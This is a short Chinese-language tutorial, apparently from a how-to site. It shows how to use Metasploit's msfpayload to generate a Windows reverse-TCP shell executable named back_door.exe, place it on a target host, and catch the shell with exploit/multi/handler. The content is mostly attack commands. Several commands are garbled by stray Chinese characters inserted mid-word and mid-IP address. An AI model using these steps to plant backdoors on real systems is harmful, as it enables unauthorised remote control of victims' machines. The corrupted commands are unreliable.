Metasploit中的载荷是在目标计算机上执行的一端代码,msf攻击载荷生成器允许用户把载荷进行分装,生成可运行的Shellcode。
工具/原料
vm
metasploit
准备阶段
1、拓扑结构
2、使用msf生成msfpayload-h//显示msfpayload命令的使用方法
3、msfpayload-l显示msfpayload支持的全面载荷
4、msfpayloadwin蟠校盯昂dows/shell_reverse_tcpO显示shell_reverse忧溲枷茫_tcp这个payload需要设置的参数,该payload会从服务器反弹连接到指定的控制端上,以上的“o”是大写的英文字母
5、msfpayloadwin蟠校盯昂dows/shell_reverse_tcpLHOST=192.168.1.吭稿荔徊106X>back_door.exe设置反弹连接的地址为192.168.1.106,X参数表示生成可执行文件。
6、生成的可执行文件
7、将文件放在被攻击的主机上
测试
1、使用msfconsole进行测试
2、useexploit/multi/hand盟敢势袂le//装入模块setpayloadwindows/shell/reverse_tcp//设置Showoptions//查看选项
3、setLHOST192.168.1.106//设置选项exploit//启用模块
结果
1、得到反弹连接
